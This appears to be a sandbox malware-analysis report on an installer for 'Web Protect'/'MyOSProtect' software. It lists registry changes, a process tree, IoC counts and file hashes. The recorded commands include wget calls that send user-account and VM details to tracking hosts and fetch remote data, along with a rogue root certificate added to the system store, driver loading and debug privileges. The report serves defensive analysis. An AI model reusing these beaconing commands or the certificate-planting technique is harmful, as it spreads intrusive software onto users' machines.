\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{632ACF93-7DAA-4CFD-8BB5-9DCBB9116176}\TypeLib\ = "{3E4048A7-8F44-48DC-9163-16A4803F7826}" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DA5534ED-88FD-49fa-9D2D-B92584CB21AC}\LocalServer32\ = "\"C:\\Program Files (x86)\\Web Protect\\MyOSProtect.exe\"" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D9DB233-DC4B-4677-946C-5FA5ABCF506B}\ = "IParentalControl" MyOSProtect.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1A2A195A-A0F9-4006-AF02-3F05EEFDE792}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DE4EF20E-BC71-4a63-BC1E-C13B37815A00} MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DA5534ED-88FD-49fa-9D2D-B92584CB21AC}\VersionIndependentProgID MyOSProtect.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A55DCF1-2410-4139-A579-15DED320D84A} MyOSProtect.exe -
Processes:
MyOSProtect.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\FF1F6CD8315EBB20B9378CA40C6AB5B5EF4B239A MyOSProtect.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\FF1F6CD8315EBB20B9378CA40C6AB5B5EF4B239A\Blob = 030000000100000014000000ff1f6cd8315ebb20b9378ca40c6ab5b5ef4b239a20000000010000009d0300003082039930820302a0030201020209009b11afd3c5b09e7b300d06092a864886f70d0101050500308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e63301e170d3134303130373135353535335a170d3334303130323135353535335a308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e6330819f300d06092a864886f70d010101050003818d0030818902818100bf42c6c055d932b18592356bfd7679f6380d06fa77f2b6836ceb1a9c29533578e7a9e4bda4e335feb769a9a07f3200dd533916e0027d55e6cbf4a5a5fc3d1933028e0cf92f7edbe004f33312d1c8ca0291835e656e09f4d4c4de26d43aefca5f32620377a238d0a09e6f744817d0e6d7d02b73424529cb0f329e0916fe68cfa90203010001a381f83081f5300c0603551d13040530030101ff301d0603551d0e04160414cd753bef8d688ff1b7081da39b059a180edfdf003081c50603551d230481bd3081ba8014cd753bef8d688ff1b7081da39b059a180edfdf00a18196a48193308190311d301b060355040a13144f626a656374696679204d6564696120496e63203123302106092a864886f70d0109011614636f6e74616374406f626a6563746966792e6361311230100603550407130956616e636f75766572310b3009060355040813024243310b3009060355040613024341311c301a060355040313134f626a656374696679204d6564696120496e638209009b11afd3c5b09e7b300d06092a864886f70d0101050500038181000b5f14595f51ae3008b76990c5564777cb310a0b009cdafa0ea3cdc532fd1b2da83490d47f28e498c83900b3128e086ff4cbf0483b8002f54de75855eb9a6ca160e83853539022248d537f4485d4a492ac151e4d0a1809a8a976113ed37d707f9392285187307aa11ea46f4377003c862a96fb39c364c7f370d426a4ad0c733a MyOSProtect.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegisterMyOSProtect.exeRegisterMyOSProtect64.exeMyOSProtect.exeMyOSProtect.exed6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exeMyOSProtect.exepid process 4084 RegisterMyOSProtect.exe 4084 RegisterMyOSProtect.exe 2776 RegisterMyOSProtect64.exe 2776 RegisterMyOSProtect64.exe 3164 MyOSProtect.exe 3164 MyOSProtect.exe 3164 MyOSProtect.exe 3164 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 1604 MyOSProtect.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe 4408 MyOSProtect.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
RegisterMyOSProtect.exeRegisterMyOSProtect64.exepid process 4084 RegisterMyOSProtect.exe 648 2776 RegisterMyOSProtect64.exe 648 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
RegisterMyOSProtect.exeRegisterMyOSProtect64.exeMyOSProtect.exeMyOSProtect.exedescription pid process Token: SeLoadDriverPrivilege 4084 RegisterMyOSProtect.exe Token: SeLoadDriverPrivilege 2776 RegisterMyOSProtect64.exe Token: SeDebugPrivilege 1604 MyOSProtect.exe Token: SeDebugPrivilege 4408 MyOSProtect.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exeprecollect.exemonitor.exepostcollect.exedescription pid process target process PID 5036 wrote to memory of 544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe precollect.exe PID 5036 wrote to memory of 544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe precollect.exe PID 5036 wrote to memory of 544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe precollect.exe PID 544 wrote to memory of 2784 544 precollect.exe wget.exe PID 544 wrote to memory of 2784 544 precollect.exe wget.exe PID 544 wrote to memory of 2784 544 precollect.exe wget.exe PID 5036 wrote to memory of 2292 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe postcollect.exe PID 5036 wrote to memory of 2292 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe postcollect.exe PID 5036 wrote to memory of 2292 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe postcollect.exe PID 5036 wrote to memory of 2332 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe systeminfo.exe PID 5036 wrote to memory of 2332 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe systeminfo.exe PID 5036 wrote to memory of 2332 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe systeminfo.exe PID 5036 wrote to memory of 3904 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 3904 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 3904 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 1488 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 1488 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 1488 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 2844 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 2844 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 2844 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 4828 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe monitor.exe PID 5036 wrote to memory of 4828 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe monitor.exe PID 5036 wrote to memory of 4828 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe monitor.exe PID 4828 wrote to memory of 2052 4828 monitor.exe sc.exe PID 4828 wrote to memory of 2052 4828 monitor.exe sc.exe PID 4828 wrote to memory of 2052 4828 monitor.exe sc.exe PID 4828 wrote to memory of 5004 4828 monitor.exe systeminfo.exe PID 4828 wrote to memory of 5004 4828 monitor.exe systeminfo.exe PID 4828 wrote to memory of 5004 4828 monitor.exe systeminfo.exe PID 5036 wrote to memory of 4084 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe RegisterMyOSProtect.exe PID 5036 wrote to memory of 4084 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe RegisterMyOSProtect.exe PID 5036 wrote to memory of 4084 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe RegisterMyOSProtect.exe PID 5036 wrote to memory of 2776 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe RegisterMyOSProtect64.exe PID 5036 wrote to memory of 2776 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe RegisterMyOSProtect64.exe PID 5036 wrote to memory of 3164 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe MyOSProtect.exe PID 5036 wrote to memory of 3164 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe MyOSProtect.exe PID 5036 wrote to memory of 3164 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe MyOSProtect.exe PID 5036 wrote to memory of 1544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 1544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 1544 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 4532 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe DirectControl.exe PID 5036 wrote to memory of 4532 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe DirectControl.exe PID 5036 wrote to memory of 4532 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe DirectControl.exe PID 5036 wrote to memory of 3788 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 3788 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 3788 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 3512 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 3512 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 3512 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe sc.exe PID 5036 wrote to memory of 1644 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 1644 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 1644 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 3120 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 3120 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 5036 wrote to memory of 3120 5036 d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe wget.exe PID 2292 wrote to memory of 4940 2292 postcollect.exe wget.exe PID 2292 wrote to memory of 4940 2292 postcollect.exe wget.exe PID 2292 wrote to memory of 4940 2292 postcollect.exe wget.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe"C:\Users\Admin\AppData\Local\Temp\d6a22844cc831a3c244bc9e0ad4f3be5351cd7c5a28c5425dd8640bc2446d47a.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Program Files (x86)\Web Protect\precollect.exe"C:\Program Files (x86)\Web Protect\precollect.exe" /iid {00000} /nid adk /product wp2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q -O "tmpfile" "http://tk.software-net.org/prepost/pre.php?iid={00000}&nid=adk&aid=&winver=&bit=64&uaccount=Admin&pcpIsInstalled=&pcpIsOtherInstalled=&pcpIsOtherDetails=&pcwatchExists=0"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2784 -
C:\Program Files (x86)\Web Protect\postcollect.exe"C:\Program Files (x86)\Web Protect\postcollect.exe" /iid {D4795842-5C50-4FA0-B61C-168D05C3514B} /nid adk /product wp2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q -O "tmpfile" "http://track.trkinstall.com/prepost/post.php?iid={D4795842-5C50-4FA0-B61C-168D05C3514B}&nid=adk&aid=&winver=&bit=64&uaccount=Admin&pcpIsInstalled=&pcpIsOtherInstalled=&pcpIsOtherDetails=&pcwatchExists=0&pcpRunning=0"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4940 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2332 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q -O "jsurl.txt" "http://cdn.traqingsvc.com/webprotect/V4/adk/js_url.data"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3904 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q -O "idate.txt" "http://track.traqingsvc.com/installdate.php"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1488 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q -O "itime.txt" "http://track.traqingsvc.com/installtimestamp.php"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2844 -
C:\monitor.exeC:\monitor.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\sc.exesc start "PCProtect"3⤵
- Launches sc.exe
PID:2052 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:5004 -
C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe"C:\Program Files (x86)\Web Protect\RegisterMyOSProtect.exe" -b -d MyOSProtect.dll2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4084 -
C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe"C:\Program Files (x86)\Web Protect\RegisterMyOSProtect64.exe" -b -d MyOSProtect64.dll2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2776 -
C:\Program Files (x86)\Web Protect\MyOSProtect.exe"C:\Program Files (x86)\Web Protect\MyOSProtect.exe" /Service2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3164 -
C:\Windows\SysWOW64\sc.exesc start "MyOSProtect"2⤵
- Launches sc.exe
PID:1544 -
C:\Program Files (x86)\Web Protect\DirectControl.exe"C:\Program Files (x86)\Web Protect\DirectControl.exe" -x642⤵
- Executes dropped EXE
PID:4532 -
C:\Windows\SysWOW64\sc.exesc stop "MyOSProtect"2⤵
- Launches sc.exe
PID:3788 -
C:\Windows\SysWOW64\sc.exesc start "MyOSProtect"2⤵
- Launches sc.exe
PID:3512 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q --post-data=type=install&i={D4795842-5C50-4FA0-B61C-168D05C3514B}&nid=adk&aid=0&browser=XX&installed=0&testgroup=&version=211&isAdministrator=&isVM=1 -O "status2.txt" "http://track.traqingsvc.com/diagnose.php"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1644 -
C:\Program Files (x86)\Web Protect\wget.exe"C:\Program Files (x86)\Web Protect\wget.exe" -q --post-data=type=install&i={D4795842-5C50-4FA0-B61C-168D05C3514B}&nid=adk&aid=0&browser=XX&installed=0&testgroup=&version=211&isVM=1 -O "status3.txt" "http://track3.traqingsvc.com/diagnose_redundant.php"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3120
-
C:\Program Files (x86)\Web Protect\MyOSProtect.exe"C:\Program Files (x86)\Web Protect\MyOSProtect.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
C:\Program Files (x86)\Web Protect\MyOSProtect.exe"C:\Program Files (x86)\Web Protect\MyOSProtect.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
47KB
MD5d2b8c1277e2b57b6ca649046c07229c2
SHA1759ceb9596e8001e1fb8643ff3cf3badff7d52da
SHA25626209340744ed288d789255411677215edfd55575455877a5797e6bbac9f830d
SHA5124320adf8bf1efe620ffcb980c79b06041b3b2a3c883b35f02ca1f1077f1f66ef61b6db6e2b6915bf0e28a5a85396f9f498e6271a29e393d927bb529bee576cc8
-
Filesize
47KB
MD5d2b8c1277e2b57b6ca649046c07229c2
SHA1759ceb9596e8001e1fb8643ff3cf3badff7d52da
SHA25626209340744ed288d789255411677215edfd55575455877a5797e6bbac9f830d
SHA5124320adf8bf1efe620ffcb980c79b06041b3b2a3c883b35f02ca1f1077f1f66ef61b6db6e2b6915bf0e28a5a85396f9f498e6271a29e393d927bb529bee576cc8
-
Filesize
45KB
MD58f9b7e06b4b7a78cfcb7698d5a232f24
SHA1fab618c475a5b59c05854e97a409882784fb0a92
SHA25676a4f6a60248aa01f317ac912c72e3997f4adaea7758e619897a435ff9ee5415
SHA51236da7bb70a7a6544f1930a82ccfa330c86fc62f623e03b80f30d52b3497842259d87aef4ac19d06af1bcce6fa5a135423645be332dc4090859fb83d36255001d
-
Filesize
45KB
MD58f9b7e06b4b7a78cfcb7698d5a232f24
SHA1fab618c475a5b59c05854e97a409882784fb0a92
SHA25676a4f6a60248aa01f317ac912c72e3997f4adaea7758e619897a435ff9ee5415
SHA51236da7bb70a7a6544f1930a82ccfa330c86fc62f623e03b80f30d52b3497842259d87aef4ac19d06af1bcce6fa5a135423645be332dc4090859fb83d36255001d
-
Filesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
Filesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
Filesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
Filesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
Filesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
Filesize
11KB
MD5c17103ae9072a06da581dec998343fc1
SHA1b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f
-
Filesize
11KB
MD5c17103ae9072a06da581dec998343fc1
SHA1b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f
-
Filesize
11KB
MD5c17103ae9072a06da581dec998343fc1
SHA1b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
SHA5123fca284e384abc95201dc73f19bd9d75413e8890e819967070b9d9991115be2a8c17e07bd1aaaffcbc770b393bf9a2af253100ac4d9efba8d21110bac97737fc
-
Filesize
4KB
MD5e3f3809f51c7982d96aaf9c090f7d176
SHA17494daa8000c0b31c58d94edc509232569a4606f
SHA256010f5e0c69b4a630b08b2551e03d8044a33350f151848dcf50953407012fab29
